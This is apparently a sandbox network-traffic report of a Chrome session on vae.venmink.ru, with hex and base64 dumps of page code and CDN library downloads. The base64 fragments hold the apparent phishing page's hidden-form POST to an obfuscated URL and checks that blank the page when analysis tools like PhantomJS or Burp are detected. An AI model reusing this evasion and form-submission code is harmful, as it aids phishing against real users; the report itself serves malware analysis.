                                                                    2024-12-19 16:51:13 UTC1369INData Raw: 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 48 56 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 64 57 45 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6e 6c 30 62 30 31 4b 53 58 5a 57 5a 56 59 69 50 67 30 4b 55 6e 56 75 62 6d 6c 75 5a 79 42 69 63 6d 39 33 63 32 56 79 49 47
                                                                    Data Ascii: iaGlkZGVuIiBpZD0iYmx0ZHVhIiBuYW1lPSJibHRkdWEiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9Inl0b01KSXZWZVYiPg0KUnVubmluZyBicm93c2VyIG
                                                                    2024-12-19 16:51:13 UTC1369INData Raw: 50 54 34 67 65 77 30 4b 49 43 41 67 49 47 6c 6d 4b 48 52 6c 65 48 51 67 50 54 30 67 4d 43 6c 37 44 51 6f 67 49 43 41 67 5a 6d 56 30 59 32 67 6f 53 33 52 61 59 33 6c 6d 63 57 46 70 56 69 77 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 74 5a 58 52 6f 62 32 51 36 49 43 4a 51 54 31 4e 55 49 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 59 6d 39 6b 65 54 6f 67 62 6d 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 46 4e 68 65 55 4a 7a 5a 6b 4a 7a 64 31 51 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52
                                                                    Data Ascii: PT4gew0KICAgIGlmKHRleHQgPT0gMCl7DQogICAgZmV0Y2goS3RaY3lmcWFpViwgew0KICAgICAgICBtZXRob2Q6ICJQT1NUIiwNCiAgICAgICAgYm9keTogbmV3IEZvcm1EYXRhKFNheUJzZkJzd1QpDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYXR
                                                                    2024-12-19 16:51:13 UTC1369INData Raw: 73 74 6e 61 6d 65 20 3a 20 54 77 42 49 55 66 57 4b 68 79 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 74 68 65 20 61 62 73 65 6e 63 65 20 6f 66 20 66 61 69 6c 75 72 65 3b 20 69 74 26 23 30 33 39 3b 73 20 74 68 65 20 70 65 72 73 69 73 74 65 6e 63 65 20 74 68 72 6f 75 67 68 20 66 61 69 6c 75 72 65 2e 20 2a 2f 0d 0a 69 66 28 75 72 6a 6b 76 4c 6a 44 56 53 20 3d 3d 20 49 76 58 4e 53 77 73 54 68 49 29 7b 0d 0a 63 6f 6e 73 74 20 46 75 65 48 54 73 4b 42 70 5a 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b
                                                                    Data Ascii: stname : TwBIUfWKhy.hostname.split('.').slice(-2).join('.');/* Success is not the absence of failure; it&#039;s the persistence through failure. */if(urjkvLjDVS == IvXNSwsThI){const FueHTsKBpZ = window.location.pathname.split('%23')[0].split('%3F')[
                                                                    2024-12-19 16:51:13 UTC1369INData Raw: 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 31 70 42 55 56 64 35 56 6c 52 4b 64 32 30 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 31 70 42 55 56 64 35 56 6c 52 4b 64 32 30 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 57 6b 46 52 56 33 6c 57 56 45 70 33 62 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39
                                                                    Data Ascii: aW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI1pBUVd5VlRKd20gaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1pBUVd5VlRKd20gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojWkFRV3lWVEp3bSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm9
                                                                    2024-12-19 16:51:13 UTC1369INData Raw: 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39
                                                                    Data Ascii: 20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549723104.17.24.144431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:14 UTC560OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                    Host: cdnjs.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://vae.venmink.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:15 UTC957INHTTP/1.1 200 OK
                                                                    Date: Thu, 19 Dec 2024 16:51:15 GMT
                                                                    Content-Type: application/javascript; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Access-Control-Allow-Origin: *
                                                                    Cache-Control: public, max-age=30672000
                                                                    ETag: W/"61182885-40eb"
                                                                    Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                    cf-cdnjs-via: cfworker/kv
                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                    Timing-Allow-Origin: *
                                                                    X-Content-Type-Options: nosniff
                                                                    CF-Cache-Status: HIT
                                                                    Age: 82930
                                                                    Expires: Tue, 09 Dec 2025 16:51:15 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKwATzwmGp0s%2FEvdvu7SX3f5muviPQb%2FBAopelWkcCOEVoMUGPvs9EO2irDG1EEbbR20udDSXlzrWz2ziFayjt5WU266zYW2I3xVSw0YUJlF0CMmBEZdwjkQjI%2B6JufCxRGVfFRf"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                    Strict-Transport-Security: max-age=15780000
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f48e573cbf55e67-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-12-19 16:51:15 UTC412INData Raw: 37 62 66 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                    Data Ascii: 7bf4!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                    2024-12-19 16:51:15 UTC1369INData Raw: 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74
                                                                    Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.creat
                                                                    2024-12-19 16:51:15 UTC1369INData Raw: 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74
                                                                    Data Ascii: ll(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)t
                                                                    2024-12-19 16:51:15 UTC1369INData Raw: 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61
                                                                    Data Ascii: of t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a
                                                                    2024-12-19 16:51:15 UTC1369INData Raw: 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f
                                                                    Data Ascii: r t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?
                                                                    2024-12-19 16:51:15 UTC1369INData Raw: 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e
                                                                    Data Ascii: r(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>
                                                                    2024-12-19 16:51:15 UTC1369INData Raw: 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e
                                                                    Data Ascii: t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fun
                                                                    2024-12-19 16:51:15 UTC1369INData Raw: 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52
                                                                    Data Ascii: rAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQR
                                                                    2024-12-19 16:51:15 UTC1369INData Raw: 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e
                                                                    Data Ascii: sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this.
                                                                    2024-12-19 16:51:15 UTC1369INData Raw: 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35
                                                                    Data Ascii: m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[5


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.549722151.101.66.1374431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:14 UTC532OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                    Host: code.jquery.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://vae.venmink.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:15 UTC613INHTTP/1.1 200 OK
                                                                    Connection: close
                                                                    Content-Length: 89501
                                                                    Server: nginx
                                                                    Content-Type: application/javascript; charset=utf-8
                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                    ETag: "28feccc0-15d9d"
                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                    Access-Control-Allow-Origin: *
                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                    Accept-Ranges: bytes
                                                                    Date: Thu, 19 Dec 2024 16:51:15 GMT
                                                                    Age: 3148607
                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740079-EWR
                                                                    X-Cache: HIT, HIT
                                                                    X-Cache-Hits: 2774, 5
                                                                    X-Timer: S1734627075.159254,VS0,VE0
                                                                    Vary: Accept-Encoding
